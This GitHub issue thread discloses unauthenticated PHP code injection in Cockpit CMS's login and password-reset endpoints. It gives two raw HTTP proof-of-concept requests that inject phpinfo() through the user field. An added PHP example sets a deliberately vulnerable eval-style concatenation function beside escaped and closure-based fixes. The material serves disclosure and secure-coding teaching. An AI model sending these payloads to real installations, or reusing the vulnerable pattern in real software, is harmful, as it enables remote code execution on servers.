Open waid-br opened 3 years ago
@RResende2 Thanks for pointing this out. I use cockpit myself and was a bit shocked finding a way to hack it explained in a way that every script kid could do it right on the project's repo. There must be a better way to handle problems like this. Do you think querying recent CVEs for cockpit and comparing them with the current version that is running could help to alert users running insecure versions? Sort of like what Jenkins has with the built-in security warning feature. Apart from that, maybe an official way for responsible disclosure of the bug.
Hello! I was using an outdated version of the CMS and found multiple code injection vulnerabilities.
This works for unauthenticated users that try to log in or recover a user password.
PoC 1 - Usual request/response
PoC 1 - PoC request
```http
POST /auth/check HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0
Content-Type: application/json; charset=UTF-8
Content-Length: 52
Origin: https://example.com

{"auth":{"user":"test'.phpinfo().'","password":"b"}}
```
PoC 1 - PoC request/response
PoC 2 - Usual request/response
PoC 2 - Raw request
```http
POST /auth/requestreset HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0
Content-Type: application/json; charset=UTF-8
Content-Length: 52
Origin: https://example.com

{"user":"test'.phpinfo().'"}
```
PoC 2 - PoC request/response
The issue was found in /var/www/html/lib/MongoLite/Database.php(107) and seems to be already fixed by escaping special characters in the string.
Can I register this as a CVE? Maybe this can help users who still use the outdated version.
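To make the root cause and the fix concrete, here is an added illustration in PHP. It is not Cockpit's or MongoLite's own code; it models the general pattern the issue describes (a user-supplied value spliced into PHP source that is later evaluated) with hypothetical helper functions, and shows why escaping the value, or better not generating code at all, keeps the single quote from breaking out of the string literal.

```php
<?php
// Added example, not code from the Cockpit project. The function names and the
// shape of the generated code are assumptions used to illustrate the class of bug.

// Vulnerable pattern: raw string concatenation into generated PHP source.
// A single quote in $value terminates the literal, and whatever follows is
// parsed as PHP code when the string is later passed to eval().
function compile_filter_unsafe(string $field, string $value): string
{
    return "return \$doc['{$field}'] === '{$value}';";
}

// Hardened pattern: var_export() emits a valid PHP string literal with quotes
// and backslashes escaped, so the value can never leave the literal. This is
// the "escape special chars" style of fix the issue mentions.
function compile_filter_safe(string $field, string $value): string
{
    return 'return $doc[' . var_export($field, true) . '] === '
         . var_export($value, true) . ';';
}

// Safest pattern: do not generate code at all. A closure captures the value as
// data, so there is no source text for an injected quote to alter.
function make_filter(string $field, string $value): callable
{
    return static fn(array $doc): bool => ($doc[$field] ?? null) === $value;
}

// Constructed input mirroring the PoC payload quoted in the issue.
$payload = "test'.phpinfo().'";

echo compile_filter_unsafe('user', $payload), PHP_EOL;
// return $doc['user'] === 'test'.phpinfo().'';
// -> the literal ends after "test" and phpinfo() becomes executable code.

echo compile_filter_safe('user', $payload), PHP_EOL;
// return $doc['user'] === 'test\'.phpinfo().\'';
// -> the whole payload stays inside one string literal.

$matches = make_filter('user', $payload);
var_dump($matches(['user' => 'alice']));   // bool(false)
var_dump($matches(['user' => $payload]));  // bool(true): compared as data only
```

Reviewing generated-code paths for this pattern is straightforward: any place where request-controlled text is concatenated into a string that later reaches eval() or create_function() needs either a literal-safe encoder such as var_export() or, preferably, a rewrite to plain data comparison as in make_filter().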